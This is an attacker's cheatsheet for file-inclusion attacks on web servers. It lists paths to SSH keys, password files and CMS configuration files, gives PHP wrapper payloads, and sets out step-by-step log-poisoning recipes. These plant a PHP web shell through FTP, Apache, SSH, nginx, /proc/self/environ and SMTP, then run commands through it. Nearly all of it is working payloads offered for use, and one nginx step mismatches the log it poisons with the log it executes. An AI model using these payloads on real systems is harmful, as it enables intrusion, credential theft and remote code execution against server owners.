LFI / RFI Cheatsheet
Passwords, Credentials, PHP Wrappers & Log Poisoning
Passwords & Credentials
SSH
/var/lib/username/.ssh/id_rsa
/home/username/.ssh/id_rsa
Apache
/var/log/apache/access.log
/var/log/apache2/access.log
/var/log/httpd/access_log
/var/log/apache/error.log
/var/log/apache2/error.log
/var/log/httpd/error_log
/etc/apache2/htpasswd
/etc/apache2/.htpasswd
/etc/apache/.htpasswd
/etc/apache2/apache2.conf
CMS
WordPress: /var/www/html/wp-config.php
Joomla: /var/www/configuration.php
Dolphin: /var/www/html/inc/header.inc.php
Drupal: /var/www/html/sites/default/settings.php
XAMPP
C:/xampp/security/webdav.htpasswd
C:/xampp/apache/conf/httpd.conf
C:/xampp/apache/logs/access.log
PHP Wrapper
php://filter/convert.base64-encode/resource=
file=expect://whoami
php://input&cmd=whoami
Log Poisoning
FTP
Firstly, you need to be able to access:
../../../../../../../../var/log/vsftpd.log
If this is possible, attempt to log in:
ftp 192.168.x.x
Supply the following name:
Name: <?php system($_GET[‘cmd’]); ?>
Exit and attempt the below execution:
../../../../../../../../var/log/vsftpd.log&cmd=whoami
Apache2 I
Firstly, you need to be able to access:
../../../../../../../../var/log/apache2/access.log
If this is possible, attempt to poison:
nc 192.168.xx.xx 80
Enter the following and press enter:
<?php system($_GET[‘cmd’]); ?>
Exit and attempt the below execution:
../../../../../../../../var/log/apache2/access.log&cmd=whoami
Apache2 II
Firstly, you need to be able to access:
../../../../../../../../var/log/apache2/access.log
If this is possible, attempt to poison within the User-Agent:
<?php system($_GET[‘cmd’]); ?>
Exit and attempt the below execution:
../../../../../../../../var/log/apache2/access.log&cmd=whoami
SSH
Firstly, you need to be able to access:
../../../../../../../../var/log/auth.log
Attempt to login using the following:
ssh ‘<?php echo system($_GET[“cmd”]); exit; ?>’@192.168.x.x
Exit and attempt the below execution:
../../../../../../../../var/log/auth.log&cmd=whoami
Nginx
Firstly, you need to be able to access:
../../../../../../../../var/log/nginx/access.log
Attempt to inject the following:
http://192.168.x.x/file.php?file=<?php system($_GET[‘cmd’]); ?>
Attempt the below execution:
../../../../../../../../var/log/nginx/error.log&cmd=whoami
Environ
Firstly, you need to be able to access:
../../../../../../../../proc/self/environ
If this is possible, attempt to poison within the User-Agent:
<?php system($_GET[‘cmd’]); ?>
Exit and attempt the below execution:
../../../../../../../../proc/self/environ&cmd=whoami
SMTP
Get username first (/etc/passwd)
telnet 192.168.x.x 25
Enter the following:
EHLO andy
VRFY username@localhost
mail from: andy@hack.com
rcpt to: username@localhost
data
Subject: owned
<?php echo system($_REQUEST[‘cmd’]); ?>
Press Enter.
dot (.)
Press Enter.
Exit and attempt the below execution:
../../../../../../../../var/mail/username&cmd=whoami